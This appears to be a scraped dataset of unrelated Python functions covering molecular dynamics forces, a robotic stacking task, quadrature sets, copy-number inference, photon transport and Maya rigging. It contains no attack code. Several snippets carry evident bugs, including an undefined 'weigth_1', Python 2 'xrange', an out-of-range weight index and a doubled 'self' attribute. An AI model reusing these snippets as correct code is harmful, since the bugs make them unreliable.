np.sum(fij,axis=0) # Aggregate force on atoms in j-cell\n\n # Copy forces from list of cell arrays to main force array\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n ci1 = np.ravel_multi_index(ci,(sc,sc,sc),mode='wrap') # Single-index\n f[mask,:] = fc[ci1] # Copy atom forces from correct cell\n\n else:\n \n # Build list of arrays, each array holding indices of atoms in a cell\n # ki and kj are atom indices in the r array; i and j number the atoms in each cell\n k_array = np.arange(n) # Atom indices 0..N-1\n kc = [] # Initially empty list of indices\n for ci in product(range(sc),repeat=3): # Triple loop over cells\n mask = np.all(c==ci,axis=1) # Mask identifies atoms in this cell\n kc.append(k_array[mask]) # Copy atom indices into array, add to list\n\n for ci1, kci in enumerate(kc): # Loop over i-cells, getting atom indices as an array\n ci = np.unravel_index(ci1,(sc,sc,sc)) # Get i-cell triple-indices\n\n # Set up correct neighbour cell indices\n if ci[1]==sc-1: # i-cell is in the top layer\n dd = d # Standard list copied, including extra 3 cells\n dd[5:,0] = dd[5:,0] - shift # All those looking up need adjustment in the x direction\n else:\n dd = d[:-3,:] # Last three extra cells are not needed; shift is not needed\n\n for dj in dd: # Loop over neighbouring j-cells\n cj = ci + dj # Compute neighbour j-cell triple-indices\n cj1 = np.ravel_multi_index(cj,(sc,sc,sc),mode='wrap') # Convert to single-index\n kcj = kc[cj1] # Get indices of atoms in j-cell as an array\n\n for i, ki in enumerate(kci): # Loop over individual atoms in i-cell\n j0 = i+1 if cj1==ci1 else 0 # Only look upwards if i-cell==j-cell\n if j0 >= kcj.size: # Handles (redundantly) empty j-cell and the case \n continue # where j-cell==i-cell and i is last atom\n\n for kj in kcj[j0:]: # Loop over individual atoms in j-cell\n rij = r[ki,:]-r[kj,:] # Separation vector\n rij[0] = rij[0] - np.rint(rij[1])*strain # Extra correction in box=1 units\n rij = rij - np.rint(rij) # Periodic boundary conditions in box=1 units\n rij_sq = np.sum(rij**2) # Squared separation\n\n if rij_sq < r_cut_box_sq: # Check within cutoff\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = 1.0 / rij_sq # (sigma/rij)**2\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n pot = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = pot + sr12 # LJ virial\n pot = pot + 0.25 # WCA LJ potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = rij * vir * sr2 # LJ forces\n pyx = rij[1]*fij[0] # Off-diagonal element of pressure tensor\n total = total + PotentialType ( pot=pot, vir=vir, pyx=pyx, lap=lap, ovr=ovr )\n f[ki,:] = f[ki,:] + fij\n f[kj,:] = f[kj,:] - fij\n\n # Multiply results by numerical factors\n f = f * 24.0 # 24*epsilon\n total.pot = total.pot * 4.0 # 4*epsilon\n total.vir = total.vir * 24.0 / 3.0 # 24*epsilon and divide virial by 3\n total.pyx = total.pyx * 24.0 # 24*epsilon\n total.lap = total.lap * 24.0 * 2.0 # 24*epsilon and factor 2 for ij and ji\n \n return total, f", "def __init__(self, reference={\"mass\":[], \"size\":[]},\n mode=0,\n variables_space='space_a_b',\n fractional_reward_weight=1,\n dense_reward_weights=np.array([750, 250,\n 250, 125,\n 0.005]),\n activate_sparse_reward=False,\n tool_block_mass=0.02,\n tool_block_shape = \"cube\",\n tool_block_size=0.065,\n joint_positions=None,\n tool_block_1_position=np.array([0, 0, 0.0325]),\n tool_block_1_orientation=np.array([0, 0, 0, 1]),\n tool_block_2_position=np.array([0.01, 0.08, 0.0325]),\n tool_block_2_orientation=np.array([0, 0, 0, 1]),\n goal_position=np.array([-0.06, -0.06, 0.0325]),\n goal_orientation=np.array([0, 0, 0, 1])):\n super().__init__(task_name=\"stacking2\",\n variables_space=variables_space,\n fractional_reward_weight=fractional_reward_weight,\n dense_reward_weights=dense_reward_weights,\n activate_sparse_reward=activate_sparse_reward,\n reference=reference,\n mode=mode)\n self._task_robot_observation_keys = [\"time_left_for_task\",\n \"joint_positions\",\n \"joint_velocities\",\n \"end_effector_positions\"]\n self._task_params[\"tool_block_mass\"] = tool_block_mass\n self._task_params[\"tool_block_shape\"] = tool_block_shape\n self._task_params[\"tool_block_size\"] = tool_block_size\n self._task_params[\"joint_positions\"] = joint_positions\n self._task_params[\"tool_block_1_position\"] = tool_block_1_position\n self._task_params[\"tool_block_1_orientation\"] = tool_block_1_orientation\n self._task_params[\"tool_block_2_position\"] = tool_block_2_position\n self._task_params[\"tool_block_2_orientation\"] = tool_block_2_orientation\n self._task_params[\"goal_position\"] = goal_position\n self._task_params[\"goal_orientation\"] = goal_orientation\n self._task_params[\"tool_block_size\"] = tool_block_size\n self.previous_tool_block_1_position = None\n self.previous_tool_block_2_position = None\n self.previous_end_effector_positions = None\n self.previous_joint_velocities = None", "def cal_B(self):\n self.B = np.zeros((self.point_matrix.shape[0],\n self.attach_points.shape[0],\n self.point_matrix.shape[1]\n * self.attach_points.shape[0]))\n for i in range(0, self.point_matrix.shape[0]):\n self.B[i, :, :] = block_diag(* self.L[i, :, :])\n self.L_tether = self.L[:, self.attach_points[:, 3] == 0, :]\n self.L_tube = self.L[:, self.attach_points[:, 3] == 1, :]\n\n self.B_tether = np.zeros((self.point_matrix.shape[0],\n self.attach_points_tether.shape[0],\n self.point_matrix.shape[1]\n * self.attach_points_tether.shape[0]))\n for i in range(0, self.point_matrix.shape[0]):\n self.B_tether[i, :, :] = block_diag(* self.L_tether[i, :, :])\n\n self.B_tube = np.zeros((self.point_matrix.shape[0],\n self.attach_points_tube.shape[0],\n self.point_matrix.shape[1]\n * self.attach_points_tube.shape[0]))\n for i in range(0, self.point_matrix.shape[0]):\n self.B_tube[i, :, :] = block_diag(* self.L_tube[i, :, :])", "def __init__(self, **kwargs):\n super(VeryCleverBeamsplitter, self).__init__(**kwargs)\n self.shader_source = IL_SHADER_SOURCE\n self.centre = [0.5, 0.5]\n self.blazing_function = np.linspace(0,1,32)\n self.zernike_coefficients = np.zeros(12)", "def Build_quadrant(self) :\n\n self.omega = np.zeros((self.n_dir,3))\n self.weight = np.zeros((self.n_dir))\n\n if self.sn==2 :\n direction = 0.577350269189625764509149\n weight = 1.\n\n self.omega[0,0] = direction\n self.omega[0,1] = direction\n self.omega[0,2] = direction\n \n self.weight[0] = weight\n \n elif self.sn==4 :\n direction_1 = 0.350021174581540677777041\n direction_2 = 0.868890300722201205229788\n weight = 1./3.\n\n self.omega[0,0] = direction_2\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n \n self.omega[1,0] = direction_1\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n\n self.omega[2,0] = direction_1\n self.omega[2,1] = direction_1\n self.omega[2,2] = direction_2\n\n self.weight[0] = weight\n self.weight[1] = weight\n self.weight[2] = weight\n\n elif self.sn==6 :\n direction_1 = 0.266635401516704720331535\n direction_2 = 0.681507726536546927403750\n direction_3 = 0.926180935517489107558380\n weight_1 = 0.176126130863383433783565\n weight_2 = 0.157207202469949899549768\n\n self.omega[0,0] = direction_3\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n\n self.omega[1,0] = direction_2\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n\n self.omega[2,0] = direction_1\n self.omega[2,1] = direction_3\n self.omega[2,2] = direction_1\n\n self.omega[3,0] = direction_2\n self.omega[3,1] = direction_1\n self.omega[3,2] = direction_2\n \n self.omega[4,0] = direction_1\n self.omega[4,1] = direction_2\n self.omega[4,2] = direction_2\n\n self.omega[5,0] = direction_1\n self.omega[5,1] = direction_1\n self.omega[5,2] = direction_3\n\n self.weight[0] = weight_1\n self.weight[1] = weight_2\n self.weight[2] = weight_1\n self.weight[3] = weight_2\n self.weight[4] = weight_2\n self.weight[5] = weight_1\n\n elif self.sn==8 :\n direction_1 = 0.218217890235992381266097\n direction_2 = 0.577350269189625764509149\n direction_3 = 0.786795792469443145800830\n direction_4 = 0.951189731211341853132399\n\n weight_1 = 0.120987654320987654320988\n weight_2 = 0.0907407407407407407407407\n weight_3 = 0.0925925925925925925925926\n\n self.omega[0,0] = direction_4\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n\n self.omega[1,0] = direction_3\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n \n self.omega[2,0] = direction_2\n self.omega[2,1] = direction_3\n self.omega[2,2] = direction_1\n\n self.omega[3,0] = direction_1\n self.omega[3,1] = direction_4\n self.omega[3,2] = direction_1\n\n self.omega[4,0] = direction_3\n self.omega[4,1] = direction_1\n self.omega[4,2] = direction_2\n\n self.omega[5,0] = direction_2\n self.omega[5,1] = direction_2\n self.omega[5,2] = direction_2\n\n self.omega[6,0] = direction_1\n self.omega[6,1] = direction_3\n self.omega[6,2] = direction_2\n\n self.omega[7,0] = direction_2\n self.omega[7,1] = direction_1\n self.omega[7,2] = direction_3\n\n self.omega[8,0] = direction_1\n self.omega[8,1] = direction_2\n self.omega[8,2] = direction_3\n\n self.omega[9,0] = direction_1\n self.omega[9,1] = direction_1\n self.omega[9,2] = direction_4\n\n self.weight[0] = weight_1\n self.weight[1] = weight_2\n self.weight[2] = weight_2\n self.weight[3] = weight_1\n self.weight[4] = weight_2\n self.weight[5] = weight_3\n self.weight[6] = weight_2\n self.weight[7] = weight_2\n self.weight[8] = weight_2\n self.weight[9] = weight_1\n\n elif self.sn==10 :\n direction_1 = 0.189321326478010476671494\n direction_2 = 0.508881755582618974382711\n direction_3 = 0.694318887594384317279217\n direction_4 = 0.839759962236684758403029\n direction_5 = 0.963490981110468484701598\n\n weight_1 = 0.0893031479843567214704325\n weight_2 = 0.0725291517123655242296233\n weight_3 = 0.0450437674364086390490892\n weight_4 = 0.0539281144878369243545650\n\n self.omega[0,0] = direction_5\n self.omega[0,1] = direction_1\n self.omega[0,2] = direction_1\n \n self.omega[1,0] = direction_4\n self.omega[1,1] = direction_2\n self.omega[1,2] = direction_1\n \n self.omega[2,0] = direction_3\n self.omega[2,1] = direction_3\n self.omega[2,2] = direction_1\n \n self.omega[3,0] = direction_2\n self.omega[3,1] = direction_4\n self.omega[3,2] = direction_1\n\n self.omega[4,0] = direction_1\n self.omega[4,1] = direction_5\n self.omega[4,2] = direction_1\n\n self.omega[5,0] = direction_4\n self.omega[5,1] = direction_1\n self.omega[5,2] = direction_2\n\n self.omega[6,0] = direction_3\n self.omega[6,1] = direction_2\n self.omega[6,2] = direction_2\n\n self.omega[7,0] = direction_2\n self.omega[7,1] = direction_3\n self.omega[7,2] = direction_2\n\n self.omega[8,0] = direction_1\n self.omega[8,1] = direction_4\n self.omega[8,2] = direction_2\n\n self.omega[9,0] = direction_3\n self.omega[9,1] = direction_1\n self.omega[9,2] = direction_3\n\n self.omega[10,0] = direction_2\n self.omega[10,1] = direction_2\n self.omega[10,2] = direction_3\n\n self.omega[11,0] = direction_1\n self.omega[11,1] = direction_3\n self.omega[11,2] = direction_3\n\n self.omega[12,0] = direction_2\n self.omega[12,1] = direction_1\n self.omega[12,2] = direction_4\n\n self.omega[13,0] = direction_1\n self.omega[13,1] = direction_2\n self.omega[13,2] = direction_4\n\n self.weight[0] = weight_1\n self.weight[1] = weight_2\n self.weight[2] = weight_3\n self.weight[3] = weight_2\n self.weight[4] = weight_1\n self.weight[5] = weight_2\n self.weight[6] = weight_4\n self.weight[7] = weight_4\n self.weight[8] = weight_2\n self.weight[9] = weight_3\n self.weight[10] = weight_4\n self.weight[11] = weight_3\n self.weight[12] = weight_2\n self.weight[13] = weight_2\n self.weight[14] = weight_1\n\n elif self.sn==12 :\n direction = np.zeros((6,1))\n\n direction[0] = 0.167212652822713264084504\n direction[1] = 0.459547634642594690016761\n direction[2] = 0.628019096642130901034766\n direction[3] = 0.760021014833664062877138\n direction[4] = 0.872270543025721502340662\n direction[5] = 0.971637719251358378302376\n\n weight_1 = 0.0707625899700910439766549\n weight_2 = 0.0558811015648888075828962\n weight_3 = 0.0373376737588285824652402\n weight_4 = 0.0502819010600571181385765\n weight_5 = 0.0258512916557503911218290\n\n for i in xrange(0,6) :\n self.omega[i,0] = direction[5-i]\n self.omega[i,1] = direction[i]\n self.omega[i,2] = direction[0]\n \n offset = 6\n for i in xrange(0,5) :\n self.omega[offset+i,0] = direction[4-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[1]\n\n offset += 5\n for i in xrange(0,4) :\n self.omega[offset+i,0] = direction[3-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[2]\n \n offset += 4\n for i in xrange(0,3) :\n self.omega[offset+i,0] = direction[2-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[3]\n\n offset += 3\n for i in xrange(0,2) :\n self.omega[offset+i,0] = direction[1-i]\n self.omega[offset+i,1] = direction[i]\n self.omega[offset+i,2] = direction[4]\n \n offset += 2\n self.omega[offset+i,0] = direction[0]\n self.omega[offset+i,1] = direction[1]\n self.omega[offset+i,2] = direction[5]\n\n self.weight[0] = weigth_1\n self.weight[1] = weight_2\n self.weight[2] = weight_3\n self.weight[3] = weight_3\n self.weight[4] = weight_2\n self.weight[5] = weight_1\n self.weight[6] = weight_2\n self.weight[7] = weight_4\n self.weight[8] = weight_5\n self.weight[9] = weight_4\n self.weight[10] = weight_2\n self.weight[11] = weight_3\n self.weight[12] = weight_5\n self.weight[13] = weight_5\n self.weight[14] = weight_3\n self.weight[15] = weight_3\n self.weight[16] = weight_4\n self.weight[17] = weight_3\n self.weight[18] = weight_2\n self.weight[19] = weight_2\n self.weight[20] = weight_1", "def fit(self, h_init):\n M = h_init.shape[0]\n\n cn_states = self.create_cn_states(M, 2, self.max_copy_number, self.max_copy_number_diff)\n cn_states = np.array([cn_states] * self.N)\n cn_states[:, :, 0, :] = self.normal_copies[:, np.newaxis, :]\n\n # Remap cn states\n cn_states = cn_states[self.seg_rev_remap, :, :, :]\n\n brk_states = self.create_brk_states(M, self.max_copy_number, self.max_copy_number_diff)\n\n self.model = remixt.bpmodel.RemixtModel(\n M,\n self.N1,\n self.num_breakpoints,\n self.normal_contamination,\n cn_states,\n brk_states,\n h_init,\n self.l1,\n self.x1[:, 2],\n self.x1[:, 0:2],\n self.is_telomere,\n self.breakpoint_idx,\n self.breakpoint_orient,\n self.transition_log_prob,\n self.divergence_weight,\n )\n\n self.model.total_likelihood_mask = self._total_likelihood_mask.astype(int)\n self.model.allele_likelihood_mask = self._allele_likelihood_mask.astype(int)\n\n if self.breakpoint_init is not None:\n p_breakpoint = np.ones((self.model.self.num_breakpoints, self.model.num_brk_states))\n brk_states = np.array(self.model.brk_states)\n\n for k, bp in enumerate(self.breakpoints):\n cn = self.breakpoint_init[bp]\n\n for s in range(self.model.num_brk_states):\n if np.all(cn == brk_states[s]):\n p_breakpoint[k, s] = 1000.\n\n p_breakpoint /= np.sum(p_breakpoint, axis=-1)[:, np.newaxis]\n\n self.model.p_breakpoint = p_breakpoint\n\n self.model.transition_model = self.transition_model\n\n if self.prev_elbo is None:\n self.prev_elbo = self.model.calculate_elbo()\n\n for i in range(self.num_em_iter):\n for j in range(self.num_update_iter):\n self.variational_update()\n\n if self.do_h_update:\n self.em_update_h()\n\n self.em_update_params()\n\n elbo = self.model.calculate_elbo()\n\n self.prev_elbo_diff = elbo - self.prev_elbo\n self.prev_elbo = elbo\n\n print ('[{}] completed iteration {}'.format(_gettime(), i))\n print ('[{}] elbo: {:.10f}'.format(_gettime(), self.prev_elbo))\n print ('[{}] elbo diff: {:.10f}'.format(_gettime(), self.prev_elbo_diff))\n print ('[{}] h = {}'.format(_gettime(), np.asarray(self.model.h)))\n for name, value in self.get_likelihood_param_values().items():\n print ('[{}] {} = {}'.format(_gettime(), name, value))", "def _propagate_step(self):\n\n # optical depth to next interaction\n self.tau = -np.log(self.RNG.rand(self.N_active))\n # optical depth to sphere edge\n self.tau_edge = np.sqrt(self.tau_sphere**2 - self.tau_i**2 *\n (1. - self.mu_i**2)) - self.tau_i * self.mu_i\n\n # identify packets that escape\n self.esc_mask = self.tau_edge < self.tau\n # update number of escaping packets\n self.N_esc += self.esc_mask.sum()\n\n # identify interacting packets\n self.nesc_mask = np.logical_not(self.esc_mask)\n\n # decide which interacting packets scatter and which get absorbed\n self.abs_mask = self.RNG.rand(self.nesc_mask.sum()) >= self.albedo\n self.scat_mask = np.logical_not(self.abs_mask)\n\n # select properties of scattering packets\n self.tau = self.tau[self.nesc_mask][self.scat_mask]\n self.tau_i = self.tau_i[self.nesc_mask][self.scat_mask]\n self.mu_i = self.mu_i[self.nesc_mask][self.scat_mask]\n\n # update number of active packets\n self.N_active = self.scat_mask.sum()\n\n # update properties (position in optical depth space, propagation\n # direction) of scattering packets\n self.tau_i = np.sqrt(self.tau_i**2 + self.tau**2 +\n 2. * self.tau * self.tau_i * self.mu_i)\n self.mu_i = 2 * self.RNG.rand(self.N_active) - 1.", "def set_wl_bounds(self):\n wls = self.xds['wl'].values\n min_wl, max_wl = min(wls), max(wls)\n center = (max_wl+min_wl)/2\n min_wl, max_wl, center = round(min_wl), round(max_wl), round(center)\n self.param.band.bounds = (min_wl, max_wl)\n self.band = center - self.bw/2, center + self.bw/2\n self.center = center", "def center_barrier( self, verbose=False ):\n reactant_indicator, product_indicator = self.get_basin_indicators(self.init_path)\n n_react = np.sum(reactant_indicator)\n n_prod = np.sum(product_indicator)\n diff = np.abs(n_react-n_prod)\n delta = int(diff/2)\n basin = \"\"\n if ( n_react > n_prod ):\n # Remove the first slices from the reactant side\n self.init_path[\"energy\"] = self.init_path[\"energy\"][delta:]\n self.init_path[\"symbols\"] = self.init_path[\"symbols\"][delta:]\n self.nuc_mc.set_state( self.init_path[\"symbols\"][-1] )\n self.nuc_mc.current_energy = self.init_path[\"energy\"][-1]\n basin = \"product\"\n elif ( n_prod > n_react ):\n # Remove the last slices from the product side\n self.init_path[\"energy\"] = self.init_path[\"energy\"][:-delta]\n self.init_path[\"symbols\"] = self.init_path[\"symbols\"][:-delta]\n self.nuc_mc.set_state( self.init_path[\"symbols\"][0] )\n self.nuc_mc.current_energy = self.init_path[\"energy\"][0]\n basin = \"reactant\"\n\n new_path = {\"symbols\":[], \"energy\":[]}\n for i in range(delta):\n self.nuc_mc.network.reset()\n self.nuc_mc.sweep(nsteps=self.nsteps_per_sweep)\n self.nuc_mc.network(None)\n print(self.nuc_mc.network.get_statistics())\n new_path[\"energy\"].append(self.nuc_mc.current_energy)\n new_path[\"symbols\"].append( [atom.symbol for atom in self.nuc_mc.atoms] )\n\n if basin == \"reactant\":\n if not self.nuc_mc.is_reactant():\n raise RuntimeError(\"System leaving reactants, when starting inside the basin!\")\n elif basin == \"product\":\n if not self.nuc_mc.is_product():\n raise RuntimeError(\"System leaving products when starting inside basin!\")\n\n if basin == \"reactant\":\n self.log(\"Inserting {} states in the beginning of the trajectory\".format(delta))\n self.init_path[\"energy\"] = new_path[\"energy\"][::-1]+self.init_path[\"energy\"]\n self.init_path[\"symbols\"] = new_path[\"symbols\"][::-1]+self.init_path[\"symbols\"]\n else:\n self.init_path[\"energy\"] = self.init_path[\"energy\"]+new_path[\"energy\"]\n self.init_path[\"symbols\"] = self.init_path[\"symbols\"]+new_path[\"symbols\"]\n self.log(\"Appending {} states to the end of the trajectory\".format(delta))", "def form_segment(self,aShapers = 'numShapers',aSubShapers = 'numSubShapers',\n loftShape=None,l_basePos = None, baseSize=1.0,\n sizeWidth = 1.0, sizeLoft=1.0,\n side = None,orientHelperPlug = 'orientHelper',formAim='toEnd',\n mFormNull = None,mNoTransformNull = None,\n mDefineEndObj=None):\n _str_func = 'form_segment'\n log.debug(\"|{0}| >> self: {1}\".format(_str_func,self)+ '-'*80)\n _short = self.p_nameShort\n mc.select(cl=1)#...why maya....\n #_size_handle = baseSize\n #_size_loft = sizeLoft\n _size_width = sizeWidth\n \n _size_handle = 1.0\n _size_loft = 1.0\n \n _side = side\n _loftShape = loftShape\n _l_basePos = l_basePos\n md_handles = {}\n ml_handles = []\n ml_loftHandles = []\n md_loftHandles ={}\n ml_shapers = []\n ml_handles_chain = []\n _formAim = formAim\n \n _short = self.mNode \n _int_shapers = self.getMayaAttr(aShapers)\n _int_sub = self.getMayaAttr(aSubShapers) \n _loftSetup = self.getEnumValueString('loftSetup')\n _loftShape = self.getEnumValueString('loftShape')\n \n _baseName = self.cgmName\n if not _baseName:\n _baseName = self.blockType\n \n #Loft Shapes...-----------------------------------------------------------------------\n if _loftSetup == 'loftList':\n _l_loftShapes = ATTR.datList_get(_short,'loftList',enum=True) or []\n if len(_l_loftShapes) != _int_shapers:\n log.warning(\"|{0}| >> Not enough shapes in loftList. Padding with loftShape\".format(_str_func,i,_loftShape))\n while len(_l_loftShapes) < _int_shapers:\n _l_loftShapes.append(self.loftShape)\n else:\n _l_loftShapes = [_loftShape for i in range(_int_shapers)]\n\n log.debug(\"|{0}| >> loftShapes: {1}\".format(_str_func,_l_loftShapes)) \n \n #Subshaper count -------------------------------------------------------------------------\n l_numSubShapers = self.datList_get('numSubShapers')\n int_shapers = self.getMayaAttr(aShapers)\n int_sub = self.getMayaAttr(aSubShapers)\n if not l_numSubShapers:\n l_numSubShapers = [int_sub for i in xrange(int_shapers-1)]\n log.info(\"|{0}| >> l_numSubShapers: {1}\".format(_str_func,l_numSubShapers)) \n\n \n mHandleFactory = self.asHandleFactory()\n mRootUpHelper = self.vectorUpHelper\n #_mVectorAim = MATH.get_obj_vector(self.vectorEndHelper.mNode,asEuclid=True)\n _mVectorUp = MATH.get_obj_vector(mRootUpHelper.mNode,'y+',asEuclid=True) \n #pprint.pprint(vars())\n for i,n in enumerate(['start','end']):\n log.debug(\"|{0}| >> {1}:{2}...\".format(_str_func,i,n)) \n #mHandle = mHandleFactory.buildBaseShape('sphere2',baseSize = _size_handle, shapeDirection = 'y+')\n crv = CURVES.create_fromName('sphere2', [_size_handle,_size_handle,.2* _size_handle], direction = 'y+',baseSize=1)\n mHandle = cgmMeta.validateObjArg(crv, 'cgmObject', setClass=True)\n \n mHandle.p_parent = mFormNull\n \n mHandle.resetAttrs()\n \n self.copyAttrTo('cgmName',mHandle.mNode,'cgmName',driven='target')\n mHandle.doStore('cgmType','formHandle')\n mHandle.doStore('cgmNameModifier',n)\n \n mHandle.doName()\n \n #Convert to loft curve setup ----------------------------------------------------\n mHandleFactory.setHandle(mHandle.mNode)\n #mHandleFactory = self.asHandleFactory(mHandle.mNode)\n if n == 'start':\n _shape = 'loft' + _l_loftShapes[0][0].capitalize() + ''.join(_l_loftShapes[0][1:])\n else:\n _shape = 'loft' + _l_loftShapes[-1][0].capitalize() + ''.join(_l_loftShapes[-1][1:])\n \n mLoftCurve = mHandleFactory.rebuildAsLoftTarget(_shape, _size_loft, shapeDirection = 'z+',rebuildHandle = False)\n #mc.makeIdentity(mHandle.mNode,a=True, s = True)#...must freeze scale once we're back parented and positioned\n \n mHandleFactory.color(mHandle.mNode) \n mHandle.p_position = _l_basePos[i]\n \n md_handles[n] = mHandle\n ml_handles.append(mHandle)\n \n md_loftHandles[n] = mLoftCurve \n ml_loftHandles.append(mLoftCurve)\n \n mLoftCurve.p_parent = mFormNull\n mTransformedGroup = mLoftCurve.getMessageAsMeta('transformedGroup')\n if not mTransformedGroup:\n mTransformedGroup = mLoftCurve.doGroup(True,True,asMeta=True,typeModifier = 'transformed',setClass='cgmObject')\n mHandle.doConnectOut('scale', \"{0}.scale\".format(mTransformedGroup.mNode))\n mc.pointConstraint(mHandle.mNode,mTransformedGroup.mNode,maintainOffset=False)\n #mc.scaleConstraint(mHandle.mNode,mTransformedGroup.mNode,maintainOffset=True)\n \n mBaseAttachGroup = mHandle.doGroup(True,True, asMeta=True,typeModifier = 'attach')\n \n #Constrain the define end to the end of the form handles\n if mDefineEndObj:\n mc.pointConstraint(md_handles['end'].mNode,mDefineEndObj.mNode,maintainOffset=False)\n\n\n #>> Base Orient Helper ============================================================================\n log.debug(\"|{0}| >> Base orient helper...\".format(_str_func) + '-'*40) \n\n mHandleFactory = self.asHandleFactory(md_handles['start'].mNode)\n mBaseOrientCurve = mHandleFactory.addOrientHelper(baseSize = _size_width,\n shapeDirection = 'y+',\n setAttrs = {'ty':_size_width})\n\n self.copyAttrTo('cgmName',mBaseOrientCurve.mNode,'cgmName',driven='target')\n mBaseOrientCurve.doName()\n\n mBaseOrientCurve.p_parent = mFormNull\n mOrientHelperAimGroup = mBaseOrientCurve.doGroup(True,asMeta=True,typeModifier = 'aim')\n mc.pointConstraint(md_handles['start'].mNode, mOrientHelperAimGroup.mNode )\n \n _const = mc.aimConstraint(ml_handles[1].mNode, mOrientHelperAimGroup.mNode, maintainOffset = False,\n aimVector = [0,0,1], upVector = [0,1,0], \n worldUpObject = mRootUpHelper.mNode,\n worldUpType = 'objectrotation', \n worldUpVector = [0,1,0])\n #worldUpType = 'vector',\n #worldUpVector = [_worldUpVector.x,_worldUpVector.y,_worldUpVector.z]) \n\n self.connectChildNode(mBaseOrientCurve.mNode,orientHelperPlug)\n\n mBaseOrientCurve.setAttrFlags(['ry','rx','translate','scale','v'])\n mHandleFactory.color(mBaseOrientCurve.mNode,controlType='sub')\n mc.select(cl=True)\n\n ml_handles_chain = copy.copy(ml_handles)\n #reload(CORERIG)\n if _int_shapers > 2:\n log.debug(\"|{0}| >> more handles necessary...\".format(_str_func)) \n #Mid Track curve ============================================================================\n log.debug(\"|{0}| >> TrackCrv...\".format(_str_func)) \n _midTrackResult = CORERIG.create_at([mObj.mNode for mObj in ml_handles],'cubicTrack',#'linearTrack',\n baseName='midTrack')\n \n _midTrackCurve = _midTrackResult[0]\n mMidTrackCurve = cgmMeta.validateObjArg(_midTrackCurve,'cgmObject')\n mMidTrackCurve.rename(_baseName + 'midHandlesTrack_crv')\n mMidTrackCurve.parent = mNoTransformNull\n\n for s in _midTrackResult[1]:\n ATTR.set(s[1],'visibility',False)\n\n #>>> mid main handles =====================================================================\n l_scales = []\n for mHandle in ml_handles:\n l_scales.append(mHandle.scale)\n mHandle.scale = 1,1,1\n\n _l_posMid = CURVES.returnSplitCurveList(mMidTrackCurve.mNode,_int_shapers,markPoints = False)\n #_l_pos = [ DIST.get_pos_by_vec_dist(_pos_start, _vec, (_offsetDist * i)) for i in range(self.numControls-1)] + [_pos_end]\n\n\n #Sub handles... -----------------------------------------------------------------------------------\n log.debug(\"|{0}| >> Mid Handle creation...\".format(_str_func))\n ml_aimGroups = []\n ml_midHandles = []\n ml_midLoftHandles = []\n for i,p in enumerate(_l_posMid[1:-1]):\n log.debug(\"|{0}| >> mid handle cnt: {1} | p: {2}\".format(_str_func,i,p))\n crv = CURVES.create_fromName('sphere2', [_size_handle,_size_handle,.2* _size_handle], direction = 'y+',baseSize=1)\n mHandle = cgmMeta.validateObjArg(crv, 'cgmObject', setClass=True)\n\n self.copyAttrTo('cgmName',mHandle.mNode,'cgmName',driven='target')\n mHandle.doStore('cgmType','formHandle')\n mHandle.doStore('cgmNameModifier',\"form_{0}\".format(i+1))\n mHandle.doName() \n\n _short = mHandle.mNode\n ml_midHandles.append(mHandle)\n mHandle.p_position = p\n\n mHandle.p_parent = mFormNull\n #mHandle.resetAttrs()\n\n mHandleFactory.setHandle(mHandle.mNode)\n mLoftCurve = mHandleFactory.rebuildAsLoftTarget('loft' + _l_loftShapes[i+1][0].capitalize() + ''.join(_l_loftShapes[i+1][1:]),#_loftShape,\n _size_loft,\n shapeDirection = 'z+',rebuildHandle = False)\n #mc.makeIdentity(mHandle.mNode,a=True, s = True)#...must freeze scale once we're back parented and positioned\n ml_midLoftHandles.append(mLoftCurve)\n\n mTransformedGroup = mHandle.getMessageAsMeta('transformedGroup')\n if not mTransformedGroup:\n mTransformedGroup = mHandle.doGroup(True,True,asMeta=True,typeModifier = 'transformed')\n #mGroup = mHandle.doGroup(True,True,asMeta=True,typeModifier = 'master')\n #mAimGroup = mHandle.doGroup(True,True,asMeta=True,typeModifier = 'aim')\n\n\n _vList = DIST.get_normalizedWeightsByDistance(mTransformedGroup.mNode,\n [ml_handles[0].mNode,ml_handles[-1].mNode])\n\n #_scale = mc.scaleConstraint([ml_handles[0].mNode,ml_handles[-1].mNode],\n # mTransformedGroup.mNode,maintainOffset = False)\n \n BLOCKSHAPES.attachToCurve(mHandle, mMidTrackCurve, parentTo = mNoTransformNull, trackLink='transformedGroup')\n \n #_res_attach = RIGCONSTRAINT.attach_toShape(mTransformedGroup.mNode, mMidTrackCurve.mNode, 'conPoint')\n #TRANS.parent_set(_res_attach[0], mNoTransformNull.mNode)\n\n mTransformedGroup.resetAttrs('rotate')\n\n\n mLoftCurve.p_parent = mFormNull\n mLoftTransformedGroup = mLoftCurve.getMessageAsMeta('transformedGroup')\n if not mLoftTransformedGroup:\n mLoftTransformedGroup = mLoftCurve.doGroup(True,asMeta=True,typeModifier = 'transformed')\n\n #mTransformedGroup = mLoftCurve.doGroup(True,True,asMeta=True,typeModifier = 'transformed')\n #mHandle.doConnectOut('scale', \"{0}.scale\".format(mScaleGroup.mNode))\n mc.scaleConstraint(mHandle.mNode,\n mLoftTransformedGroup.mNode,maintainOffset = False) \n mc.pointConstraint(mHandle.mNode,mLoftTransformedGroup.mNode,maintainOffset=False)\n\n\n #for c in [_scale]:\n #CONSTRAINT.set_weightsByDistance(c[0],_vList)\n\n mHandleFactory = self.asHandleFactory(mHandle.mNode)\n\n CORERIG.colorControl(mHandle.mNode,_side,'main',transparent = True)\n CORERIG.colorControl(mLoftCurve.mNode,_side,'main',transparent = True)\n\n #Push scale back...\n for i,mHandle in enumerate(ml_handles):\n mHandle.scale = l_scales[i]\n\n\n\n 